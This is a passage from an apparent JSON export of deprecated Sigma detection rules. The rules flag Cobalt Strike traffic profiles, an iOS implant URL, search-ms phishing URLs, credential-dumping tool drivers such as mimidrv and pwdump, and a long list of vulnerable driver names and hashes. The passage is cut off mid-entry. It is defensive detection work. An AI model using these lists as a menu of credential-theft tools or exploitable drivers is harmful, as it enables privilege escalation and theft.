    "content": "title: CobaltStrike Malformed UAs in Malleable Profiles\nid: 41b42a36-f62c-4c34-bd40-8cb804a34ad8\nstatus: deprecated\ndescription: Detects different malformed user agents used in Malleable Profiles used with Cobalt Strike\nreferences:\n    - https://github.com/yeyintminthuhtut/Malleable-C2-Profiles-Collection/\nauthor: Florian Roth (Nextron Systems)\ndate: 2021/05/06\nmodified: 2024/02/15\ntags:\n    - attack.defense_evasion\n    - attack.command_and_control\n    - attack.t1071.001\nlogsource:\n    category: proxy\ndetection:\n    selection1:\n        c-useragent:\n            - 'Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)'\n            - 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E )'\n            - 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2) Java/1.5.0_08'\n    selection2:\n        c-useragent|endswith: '; MANM; MANM)'\n    condition: 1 of selection*\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "deprecated/web/proxy_cobalt_ocsp.yml",
    "content": "title: CobaltStrike Malleable (OCSP) Profile\nid: 37325383-740a-403d-b1a2-b2b4ab7992e7\nstatus: deprecated\ndescription: Detects Malleable (OCSP) Profile with Typo (OSCP) in URL\nreferences:\n    - https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/ocsp.profile\nauthor: Markus Neis\ndate: 2019/11/12\nmodified: 2024/02/15\ntags:\n    - attack.defense_evasion\n    - attack.command_and_control\n    - attack.t1071.001\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-uri|contains: '/oscp/'\n        cs-host: 'ocsp.verisign.com'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/web/proxy_cobalt_onedrive.yml",
    "content": "title: CobaltStrike Malleable OneDrive Browsing Traffic Profile\nid: c9b33401-cc6a-4cf6-83bb-57ddcb2407fc\nstatus: deprecated\ndescription: Detects Malleable OneDrive Profile\nreferences:\n    - https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/onedrive_getonly.profile\nauthor: Markus Neis\ndate: 2019/11/12\nmodified: 2024/02/15\ntags:\n    - attack.defense_evasion\n    - attack.command_and_control\n    - attack.t1071.001\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        cs-method: 'GET'\n        c-uri|endswith: '\\?manifest=wac'\n        cs-host: 'onedrive.live.com'\n    filter:\n        c-uri|startswith: 'http'\n        c-uri|contains: '://onedrive.live.com/'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/web/proxy_ios_implant.yml",
    "content": "title: iOS Implant URL Pattern\nid: e06ac91d-b9e6-443d-8e5b-af749e7aa6b6\nstatus: deprecated # Deprecated to being related to Ios so logging will vary and its old\ndescription: Detects URL pattern used by iOS Implant\nreferences:\n    - https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html\n    - https://twitter.com/craiu/status/1167358457344925696\nauthor: Florian Roth (Nextron Systems)\ndate: 2019/08/30\nmodified: 2024/02/26\ntags:\n    - attack.execution\n    - attack.t1203\n    - attack.collection\n    - attack.t1005\n    - attack.t1119\n    - attack.credential_access\n    - attack.t1528\n    - attack.t1552.001\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-uri|contains: '/list/suc\\?name='\n    condition: selection\nfields:\n    - ClientIP\n    - c-uri\n    - c-useragent\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "deprecated/web/proxy_webdav_search_ms.yml",
    "content": "title: Search-ms and WebDAV Suspicious Indicators in URL\nid: 5039f3d2-406a-4c1a-9350-7a5a85dc84c2\nstatus: deprecated # See https://github.com/SigmaHQ/sigma/pull/4845\ndescription: Detects URL pattern used by search(-ms)/WebDAV initial access campaigns.\nreferences:\n    - https://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html\n    - https://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462\nauthor: Micah Babinski\ndate: 2023/08/21\nmodified: 2024/05/10\ntags:\n    - attack.initial_access\n    - attack.t1584\n    - attack.t1566\nlogsource:\n    category: proxy\ndetection:\n    selection_search_ms:\n        c-uri|contains|all:\n            - 'search' # Matches on search:query= or search-ms:query=\n            - ':query='\n            - 'webdav'\n    selection_search_term:\n        c-uri|contains:\n            # Note: Add additional keywords for additional coverage\n            - 'agreement'\n            - 'invoice'\n            - 'notice'\n            - 'payment'\n    filter_main_local_ips:\n        dst_ip|cidr:\n            - '127.0.0.0/8'\n            - '10.0.0.0/8'\n            - '172.16.0.0/12'\n            - '192.168.0.0/16'\n            - '169.254.0.0/16'\n            - '::1/128'  # IPv6 loopback\n            - 'fe80::/10'  # IPv6 link-local addresses\n            - 'fc00::/7'  # IPv6 private addresses\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high"
  },
  {
    "path": "deprecated/windows/create_remote_thread_win_susp_remote_thread_target.yml",
    "content": "title: Suspicious Remote Thread Target\nid: f016c716-754a-467f-a39e-63c06f773987\nstatus: deprecated\ndescription: |\n  Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\n  This rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes.\n  It is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\nreferences:\n    - https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022/08/25\nmodified: 2023/05/05\nlogsource:\n    product: windows\n    category: create_remote_thread\ndetection:\n    selection:\n        TargetImage|endswith:\n            - '\\spoolsv.exe'\n            - '\\notepad.exe'\n    filter:\n        - SourceImage|endswith: '\\csrss.exe'\n        - SourceImage|contains: 'unknown process'\n        - StartFunction: 'EtwpNotificationThread'\n    condition: selection and not filter\nfields:\n    - ComputerName\n    - User\n    - SourceImage\n    - TargetImage\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/driver_load_win_mal_creddumper.yml",
    "content": "title: Credential Dumping Tools Service Execution\nid: df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2\nrelated:\n    - id: 4976aa50-8f41-45c6-8b15-ab3fc10e79ed\n      type: derived\nstatus: deprecated\ndescription: Detects well-known credential dumping tools execution via service execution events\nreferences:\n    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment\nauthor: Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community\ndate: 2017/03/05\nmodified: 2023/12/11\ntags:\n    - attack.credential_access\n    - attack.execution\n    - attack.t1003.001\n    - attack.t1003.002\n    - attack.t1003.004\n    - attack.t1003.005\n    - attack.t1003.006\n    - attack.t1569.002\n    - attack.s0005\nlogsource:\n    product: windows\n    category: driver_load\ndetection:\n    selection:\n        ImageLoaded|contains:\n            - 'cachedump'\n            - 'dumpsvc'\n            - 'fgexec'\n            - 'gsecdump'\n            - 'mimidrv'\n            - 'pwdump'\n            - 'servpw'\n    condition: selection\nfalsepositives:\n    - Legitimate Administrator using credential dumping tool for password recovery\nlevel: critical\n"
  },
  {
    "path": "deprecated/windows/driver_load_win_mal_poortry_driver.yml",
    "content": "title: Usage Of Malicious POORTRY Signed Driver\nid: 91bc09e7-674d-4cf5-8d86-ed5d8bdb95a6\nstatus: deprecated\ndescription: Detects the load of the signed poortry driver used by UNC3944 as reported by Mandiant and Sentinel One.\nreferences:\n    - https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022/12/16\nmodified: 2023/09/13\ntags:\n    - attack.privilege_escalation\n    - attack.t1543\n    - attack.t1068\nlogsource:\n    category: driver_load\n    product: windows\ndetection:\n    selection_image:\n        ImageLoaded|contains:\n            - '\\prokiller64.sys'\n            - '\\gftkyj64.sys'\n            - '\\KApcHelper_x64.sys'\n            - '\\NodeDriver.sys'\n            - '\\LcTkA.sys'\n    selection_sysmon:\n        Hashes|contains:\n            - 'SHA256=0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc'\n            - 'SHA256=9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c'\n            - 'SHA256=8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104'\n            - 'SHA256=d7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c'\n            - 'SHA256=05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4'\n            - 'SHA256=c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497'\n            - 'SHA1=31cc8718894d6e6ce8c132f68b8caaba39b5ba7a'\n            - 'SHA1=a804ebec7e341b4d98d9e94f6e4860a55ea1638d'\n            - 'SHA1=6debce728bcff73d9d1d334df0c6b1c3735e295c'\n            - 'SHA1=cc65bf60600b64feece5575f21ab89e03a728332'\n            - 'SHA1=3ef30c95e40a854cc4ded94fc503d0c3dc3e620e'\n            - 'SHA1=b2f955b3e6107f831ebe67997f8586d4fe9f3e98'\n            - 'MD5=10f3679384a03cb487bda9621ceb5f90'\n            - 'MD5=04a88f5974caa621cee18f34300fc08a'\n            - 'MD5=6fcf56f6ca3210ec397e55f727353c4a'\n            - 'MD5=0f16a43f7989034641fd2de3eb268bf1'\n            - 
'MD5=ee6b1a79cb6641aa44c762ee90786fe0'\n            - 'MD5=909f3fc221acbe999483c87d9ead024a'\n    condition: 1 of selection*\nfalsepositives:\n    - Legitimate BIOS driver updates (should be rare)\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/driver_load_win_powershell_script_installed_as_service.yml",
    "content": "title: PowerShell Scripts Run by a Services\nid: 46deb5e1-28c9-4905-b2df-51cdcc9e6073\nrelated:\n    - id: a2e5019d-a658-4c6a-92bf-7197b54e2cae\n      type: derived\nstatus: deprecated\ndescription: Detects powershell script installed as a Service\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse\nauthor: oscd.community, Natalia Shornikova\ndate: 2020/10/06\nmodified: 2023/12/11\ntags:\n    - attack.execution\n    - attack.t1569.002\nlogsource:\n    product: windows\n    category: driver_load\ndetection:\n    selection:\n        ImageLoaded|contains:\n            - 'powershell'\n            - 'pwsh'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/driver_load_win_vuln_avast_anti_rootkit_driver.yml",
    "content": "title: Vulnerable AVAST Anti Rootkit Driver Load\nid: 7c676970-af4f-43c8-80af-ec9b49952852\nstatus: deprecated\ndescription: Detects the load of a signed and vulnerable AVAST Anti Rootkit driver often used by threat actors or malware for stopping and disabling AV and EDR products\nreferences:\n    - https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022/07/28\nmodified: 2023/09/12\ntags:\n    - attack.privilege_escalation\n    - attack.t1543.003\nlogsource:\n    product: windows\n    category: driver_load\ndetection:\n    selection_sysmon:\n        Hashes|contains:\n            - 'MD5=a179c4093d05a3e1ee73f6ff07f994aa'\n            - 'SHA1=5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4'\n            - 'SHA256=4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1'\n    driver_img:\n        ImageLoaded|endswith: '\\aswArPot.sys'\n    driver_status:\n        - Signed: 'false'\n        - SignatureStatus: Expired\n    condition: selection_sysmon or all of driver_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/driver_load_win_vuln_dell_driver.yml",
    "content": "title: Vulnerable Dell BIOS Update Driver Load\nid: 21b23707-60d6-41bb-96e3-0f0481b0fed9\nstatus: deprecated\ndescription: Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551\nreferences:\n    - https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/\nauthor: Florian Roth (Nextron Systems)\ndate: 2021/05/05\nmodified: 2023/09/12\ntags:\n    - attack.privilege_escalation\n    - cve.2021.21551\n    - attack.t1543\n    - attack.t1068\nlogsource:\n    category: driver_load\n    product: windows\ndetection:\n    selection_image:\n        ImageLoaded|contains: '\\DBUtil_2_3.Sys'\n    selection_sysmon:\n        Hashes|contains:\n            - 'SHA256=0296E2CE999E67C76352613A718E11516FE1B0EFC3FFDB8918FC999DD76A73A5'\n            - 'SHA256=DDBF5ECCA5C8086AFDE1FB4F551E9E6400E94F4428FE7FB5559DA5CFFA654CC1'\n            - 'SHA1=C948AE14761095E4D76B55D9DE86412258BE7AFD'\n            - 'SHA1=10B30BDEE43B3A2EC4AA63375577ADE650269D25'\n            - 'MD5=C996D7971C49252C582171D9380360F2'\n            - 'MD5=D2FD132AB7BBC6BBB87A84F026FA0244'\n    condition: 1 of selection*\nfalsepositives:\n    - Legitimate BIOS driver updates (should be rare)\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/driver_load_win_vuln_drivers_names.yml",
    "content": "title: Vulnerable Driver Load By Name\nid: 839f1ee1-292d-495a-bf37-818267b8ee82\nrelated:\n    - id: 7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8\n      type: derived\nstatus: deprecated\ndescription: Detects the load of known vulnerable drivers via their names only.\nreferences:\n    - https://loldrivers.io/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022/10/03\nmodified: 2023/09/03\ntags:\n    - attack.privilege_escalation\n    - attack.t1543.003\n    - attack.t1068\nlogsource:\n    product: windows\n    category: driver_load\ndetection:\n    selection:\n        ImageLoaded|endswith:\n            - '\\reddriver.sys'\n            - '\\mhyprot2.sys'\n            - '\\hwos2ec7x64.sys'\n            - '\\asrdrv103.sys'\n            - '\\e29f6311ae87542b3d693c1f38e4e3ad.sys'\n            - '\\gvcidrv64.sys'\n            - '\\spwizimgvt.sys'\n            - '\\hwos2ec10x64.sys'\n            - '\\e939448b28a4edc81f1f974cebf6e7d2.sys'\n            - '\\phymemx64.sys'\n            - '\\dh_kernel.sys'\n            - '\\bs_def.sys'\n            - '\\nbiolib_x64.sys'\n            - '\\viraglt64.sys'\n            - '\\ntiolib.sys'\n            - '\\paniox64.sys'\n            - '\\libnicm.sys'\n            - '\\phymem64.sys'\n            - '\\fiddrv.sys'\n            - '\\cpuz141.sys'\n            - '\\yyprotect64.sys'\n            - '\\daxin_blank3.sys'\n            - '\\aswarpot.sys'\n            - '\\t8.sys'\n            - '\\driver7-x86-withoutdbg.sys'\n            - '\\dcr.sys'\n            - '\\b3.sys'\n            - '\\asupio.sys'\n            - '\\blackbonedrv10.sys'\n            - '\\rzpnk.sys'\n            - '\\iomem64.sys'\n            - '\\kfeco11x64.sys'\n            - '\\t.sys'\n            - '\\wantd.sys'\n            - '\\mimikatz.sys'\n            - '\\wantd_4.sys'\n            - '\\chaos-rootkit.sys'\n            - '\\mhyprot.sys'\n            - '\\nlslexicons0024uvn.sys'\n            - '\\piddrv64.sys'\n            - '\\aswvmm.sys'\n     
       - '\\superbmc.sys'\n            - '\\kprocesshacker.sys'\n            - '\\lmiinfo.sys'\n            - '\\jokercontroller.sys'\n            - '\\blackbone.sys'\n            - '\\fur.sys'\n            - '\\vboxmousent.sys'\n            - '\\mapmom.sys'\n            - '\\windows-xp-64.sys'\n            - '\\d3.sys'\n            - '\\inpout32.sys'\n            - '\\tfbfs3ped.sys'\n            - '\\etdsupp.sys'\n            - '\\asmmap64.sys'\n            - '\\lurker.sys'\n            - '\\alsysio64.sys'\n            - '\\ntiolib_x64.sys'\n            - '\\asas.sys'\n            - '\\vproeventmonitor.sys'\n            - '\\dbutil_2_3.sys'\n            - '\\malicious.sys'\n            - '\\cpupress.sys'\n            - '\\netfilter2.sys'\n            - '\\wintapix.sys'\n            - '\\mhyprotnap.sys'\n            - '\\ktes.sys'\n            - '\\titidrv.sys'\n            - '\\rtcore64.sys'\n            - '\\physmem.sys'\n            - '\\d.sys'\n            - '\\asrdrv106.sys'\n            - '\\winiodrv.sys'\n            - '\\phlashnt.sys'\n            - '\\sfdrvx64.sys'\n            - '\\ene.sys'\n            - '\\nqrmq.sys'\n            - '\\phydmaccx86.sys'\n            - '\\fd3b7234419fafc9bdd533f48896ed73_b816c5cd.sys'\n            - '\\magdrvamd64.sys'\n            - '\\a26363e7b02b13f2b8d697abb90cd5c3.sys'\n            - '\\amdryzenmasterdriver.sys'\n            - '\\amigendrv64.sys'\n            - '\\d2.sys'\n            - '\\agent64.sys'\n            - '\\bs_rcio64.sys'\n            - '\\goad.sys'\n            - '\\bsmi.sys'\n            - '\\nvflsh64.sys'\n            - '\\gametersafe.sys'\n            - '\\ndislan.sys'\n            - '\\bw.sys'\n            - '\\directio32.sys'\n            - '\\asrsmartconnectdrv.sys'\n            - '\\ktgn.sys'\n            - '\\eneio64.sys'\n            - '\\amp.sys'\n            - '\\gdrv.sys'\n            - '\\tmel.sys'\n            - '\\nstr.sys'\n            - '\\winring0.sys'\n            - '\\fiddrv64.sys'\n  
          - '\\tmcomm.sys'\n            - '\\daxin_blank2.sys'\n            - '\\poortry2.sys'\n            - '\\bsmemx64.sys'\n            - '\\asio.sys'\n            - '\\gmer64.sys'\n            - '\\panio.sys'\n            - '\\ucorew64.sys'\n            - '\\atszio64.sys'\n            - '\\nt2.sys'\n            - '\\pciecubed.sys'\n            - '\\nvflsh32.sys'\n            - '\\ssport.sys'\n            - '\\wcpu.sys'\n            - '\\winio64.sys'\n            - '\\msio64.sys'\n            - '\\black.sys'\n            - '\\nicm.sys'\n            - '\\daxin_blank1.sys'\n            - '\\my.sys'\n            - '\\tgsafe.sys'\n            - '\\dbk64.sys'\n            - '\\proxydrv.sys'\n            - '\\1fc7aeeff3ab19004d2e53eae8160ab1.sys'\n            - '\\capcom.sys'\n            - '\\asio32.sys'\n            - '\\proxy32.sys'\n            - '\\asrdrv102.sys'\n            - '\\vboxguest.sys'\n            - '\\vboxtap.sys'\n            - '\\daxin_blank.sys'\n            - '\\poortry.sys'\n            - '\\ntbios.sys'\n            - '\\glckio2.sys'\n            - '\\dbutildrv2.sys'\n            - '\\kfeco10x64.sys'\n            - '\\lenovodiagnosticsdriver.sys'\n            - '\\netfilter.sys'\n            - '\\corsairllaccess64.sys'\n            - '\\semav6msr.sys'\n            - '\\bs_rciow1064.sys'\n            - '\\vboxusbmon.sys'\n            - '\\nodedriver.sys'\n            - '\\iobitunlocker.sys'\n            - '\\smep_namco.sys'\n            - '\\asio64.sys'\n            - '\\xjokercontroller.sys'\n            - '\\irec.sys'\n            - '\\asribdrv.sys'\n            - '\\mhyprot3.sys'\n            - '\\daxin_blank6.sys'\n            - '\\fidpcidrv.sys'\n            - '\\bandai.sys'\n            - '\\procexp.sys'\n            - '\\daxin_blank5.sys'\n            - '\\daxin_blank4.sys'\n            - '\\bedaisy.sys'\n            - '\\asrdrv10.sys'\n            - '\\bwrsh.sys'\n            - '\\eio.sys'\n            - '\\winio64a.sys'\n            - 
'\\citmdrv_ia64.sys'\n            - '\\7.sys'\n            - '\\b.sys'\n            - '\\bwrs.sys'\n            - '\\nt3.sys'\n            - '\\wiseunlo.sys'\n            - '\\ncpl.sys'\n            - '\\ctiio64.sys'\n            - '\\hw.sys'\n            - '\\asromgdrv.sys'\n            - '\\bs_hwmio64.sys'\n            - '\\lgdatacatcher.sys'\n            - '\\rtkio.sys'\n            - '\\winio32.sys'\n            - '\\phydmaccx64.sys'\n            - '\\mtcbsv64.sys'\n            - '\\ni.sys'\n            - '\\b4.sys'\n            - '\\directio64.sys'\n            - '\\vboxdrv.sys'\n            - '\\nvflash.sys'\n            - '\\hpportiox64.sys'\n            - '\\bs_i2c64.sys'\n            - '\\iomap64.sys'\n            - '\\vboxusb.sys'\n            - '\\msqpq.sys'\n            - '\\sysinfo.sys'\n            - '\\mhyprotect.sys'\n            - '\\naldrv.sys'\n            - '\\lgdcatcher.sys'\n            - '\\echo_driver.sys'\n            - '\\otipcibus.sys'\n            - '\\testbone.sys'\n            - '\\lctka.sys'\n            - '\\wyproxy64.sys'\n            - '\\pchunter.sys'\n            - '\\amdpowerprofiler.sys'\n            - '\\wantd_3.sys'\n            - '\\test2.sys'\n            - '\\rtcoremini64.sys'\n            - '\\d4.sys'\n            - '\\piddrv.sys'\n            - '\\panmonflt.sys'\n            - '\\windows8-10-32.sys'\n            - '\\wantd_5.sys'\n            - '\\mjj0ge.sys'\n            - '\\kt2.sys'\n            - '\\rtkiow8x64.sys'\n            - '\\nstrwsk.sys'\n            - '\\msio32.sys'\n            - '\\ktmutil7odm.sys'\n            - '\\hwrwdrv.sys'\n            - '\\nchgbios2x64.sys'\n            - '\\bs_hwmio64_w10.sys'\n            - '\\mydrivers.sys'\n            - '\\t7.sys'\n            - '\\wantd_6.sys'\n            - '\\sandra.sys'\n            - '\\atillk64.sys'\n            - '\\cpuz.sys'\n            - '\\netproxydriver.sys'\n            - '\\protects.sys'\n            - '\\asrrapidstartdrv.sys'\n            - 
'\\dh_kernel_10.sys'\n            - '\\ef0e1725aaf0c6c972593f860531a2ea.sys'\n            - '\\enetechio64.sys'\n            - '\\citmdrv_amd64.sys'\n            - '\\iqvw64e.sys'\n            - '\\bsmixp64.sys'\n            - '\\bs_i2cio.sys'\n            - '\\prokiller64.sys'\n            - '\\netflt.sys'\n            - '\\4748696211bd56c2d93c21cab91e82a5.sys'\n            - '\\openlibsys.sys'\n            - '\\adv64drv.sys'\n            - '\\be6318413160e589080df02bb3ca6e6a.sys'\n            - '\\cupfixerx64.sys'\n            - '\\se64a.sys'\n            - '\\speedfan.sys'\n            - '\\a236e7d654cd932b7d11cb604629a2d0.sys'\n            - '\\winio32b.sys'\n            - '\\winio64b.sys'\n            - '\\sysdrv3s.sys'\n            - '\\lv561av.sys'\n            - '\\bs_def64.sys'\n            - '\\mlgbbiicaihflrnh.sys'\n            - '\\dbutil.sys'\n            - '\\834761775.sys'\n            - '\\kdriver.sys'\n            - '\\spf.sys'\n            - '\\dkrtk.sys'\n            - '\\bs_flash64.sys'\n            - '\\nt4.sys'\n            - '\\4.sys'\n            - '\\directio32_legacy.sys'\n            - '\\viragt64.sys'\n            - '\\hostnt.sys'\n            - '\\poortry1.sys'\n            - '\\c94f405c5929cfcccc8ad00b42c95083.sys'\n            - '\\b1.sys'\n            - '\\wantd_2.sys'\n            - '\\mhyprotrpg.sys'\n            - '\\nscm.sys'\n            - '\\smep_capcom.sys'\n            - '\\sense5ext.sys'\n            - '\\lha.sys'\n            - '\\atszio.sys'\n            - '\\amifldrv64.sys'\n            - '\\blacklotus_driver.sys'\n            - '\\asrautochkupddrv.sys'\n            - '\\cpuz_x64.sys'\n            - '\\asrautochkupddrv_1_0_32.sys'\n            - '\\bs_rcio.sys'\n            - '\\elbycdio.sys'\n            - '\\fidpcidrv64.sys'\n            - '\\elrawdsk.sys'\n            - '\\telephonuafy.sys'\n            - '\\rwdrv.sys'\n            - '\\lgcoretemp.sys'\n            - '\\segwindrvx64.sys'\n            - 
'\\windows7-32.sys'\n            - '\\asrsetupdrv103.sys'\n            - '\\hwinfo32.sys'\n            - '\\inpoutx64.sys'\n            - '\\asrdrv101.sys'\n            - '\\asupio64.sys'\n            - '\\monitor_win10_x64.sys'\n            - '\\msrhook.sys'\n            - '\\nt5.sys'\n            - '\\wfshbr64.sys'\n            - '\\driver7.sys'\n            - '\\sfdrvx32.sys'\n            - '\\asrdrv104.sys'\n            - '\\gameink.sys'\n            - '\\hwinfo64i.sys'\n            - '\\bsmix64.sys'\n            - '\\winio32a.sys'\n            - '\\kbdcap64.sys'\n            - '\\5a4fe297c7d42539303137b6d75b150d.sys'\n            - '\\fairplaykd.sys'\n            - '\\a9df5964635ef8bd567ae487c3d214c4.sys'\n            - '\\fgme.sys'\n            - '\\skill.sys'\n            - '\\capcom2.sys'\n            - '\\typelibde.sys'\n            - '\\nt6.sys'\n            - '\\winio64c.sys'\n            - '\\driver7-x64.sys'\n            - '\\air_system10.sys'\n            - '\\panmonfltx64.sys'\n            - '\\ntbios_2.sys'\n            - '\\viragt.sys'\n            - '\\zam64.sys'\n            - '\\vmdrv.sys'\n            - '\\iqvw64.sys'\n            - '\\1.sys'\n            - '\\t3.sys'\n            - '\\2.sys'\n            - '\\gftkyj64.sys'\n            - '\\proxy64.sys'\n            - '\\kevp64.sys'\n            - '\\netfilterdrv.sys'\n            - '\\4118b86e490aed091b1a219dba45f332.sys'\n            - '\\6771b13a53b9c7449d4891e427735ea2.sys'\n            - '\\mimidrv.sys'\n            - '\\driver7-x86.sys'\n            - '\\windbg.sys'\n            - '\\80.sys'\n            - '\\directio.sys'\n            - '\\atomicredteamcapcom.sys'\n            - '\\81.sys'\n            - '\\full.sys'\n            - '\\asrdrv.sys'\n            - '\\kapchelper_x64.sys'\n            - '\\c.sys'\n            - '\\winflash64.sys'\n            - '\\amsdk.sys'\n    condition: selection\nfalsepositives:\n    - False positives may occur if one of the vulnerable driver names 
mentioned above didn't change its name between versions. So always make sure that the driver being loaded is the legitimate one and the non-vulnerable version.\n    - If you experience a lot of FP you could comment the driver name or its exact known legitimate location (when possible)\nlevel: low\n"
  },
  {
    "path": "deprecated/windows/driver_load_win_vuln_gigabyte_driver.yml",
    "content": "title: Vulnerable GIGABYTE Driver Load\nid: 7bcfeece-e5ed-4ff3-a5fb-2640d8cc8647\nstatus: deprecated\ndescription: Detects the load of a signed and vulnerable GIGABYTE driver often used by threat actors or malware for privilege escalation\nreferences:\n    - https://medium.com/@fsx30/weaponizing-vulnerable-driver-for-privilege-escalation-gigabyte-edition-e73ee523598b\n    - https://twitter.com/malmoeb/status/1551449425842786306\n    - https://github.com/fengjixuchui/gdrv-loader\n    - https://www.virustotal.com/gui/file/31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427/details\n    - https://www.virustotal.com/gui/file/cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b/details\nauthor: Florian Roth (Nextron Systems)\ndate: 2022/07/25\nmodified: 2023/09/12\ntags:\n    - attack.privilege_escalation\n    - attack.t1543.003\nlogsource:\n    product: windows\n    category: driver_load\ndetection:\n    selection:\n        Hashes|contains:\n            - 'MD5=9AB9F3B75A2EB87FAFB1B7361BE9DFB3'\n            - 'MD5=C832A4313FF082258240B61B88EFA025'\n            - 'SHA1=FE10018AF723986DB50701C8532DF5ED98B17C39'\n            - 'SHA1=1F1CE28C10453ACBC9D3844B4604C59C0AB0AD46'\n            - 'SHA256=31F4CFB4C71DA44120752721103A16512444C13C2AC2D857A7E6F13CB679B427'\n            - 'SHA256=CFC5C585DD4E592DD1A08887DED28B92D9A5820587B6F4F8FA4F56D60289259B'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/driver_load_win_vuln_hw_driver.yml",
    "content": "title: Vulnerable HW Driver Load\nid: 9bacc538-d1b9-4d42-862e-469eafc05a41\nstatus: deprecated\ndescription: Detects the load of a legitimate signed driver named HW.sys by often used by threat actors or malware for privilege escalation\nreferences:\n    - https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/\n    - https://www.virustotal.com/gui/file/6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5/details\nauthor: Florian Roth (Nextron Systems)\ndate: 2022/07/26\nmodified: 2023/09/12\ntags:\n    - attack.privilege_escalation\n    - attack.t1543.003\nlogsource:\n    product: windows\n    category: driver_load\ndetection:\n    selection_name:\n        ImageLoaded|endswith: '\\HW.sys'\n    selection_sysmon:\n        Hashes|contains:\n            - 'SHA256=4880F40F2E557CFF38100620B9AA1A3A753CB693AF16CD3D95841583EDCB57A8'\n            - 'SHA256=55963284BBD5A3297F39F12F0D8A01ED99FE59D008561E3537BCD4DB4B4268FA'\n            - 'SHA256=6A4875AE86131A594019DEC4ABD46AC6BA47E57A88287B814D07D929858FE3E5'\n            - 'SHA1=74E4E3006B644392F5FCEA4A9BAE1D9D84714B57'\n            - 'SHA1=18F34A0005E82A9A1556BA40B997B0EAE554D5FD'\n            - 'SHA1=4E56E0B1D12664C05615C69697A2F5C5D893058A'\n            - 'MD5=3247014BA35D406475311A2EAB0C4657'\n            - 'MD5=376B1E8957227A3639EC1482900D9B97'\n            - 'MD5=45C2D133D41D2732F3653ED615A745C8'\n    condition: 1 of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/driver_load_win_vuln_lenovo_driver.yml",
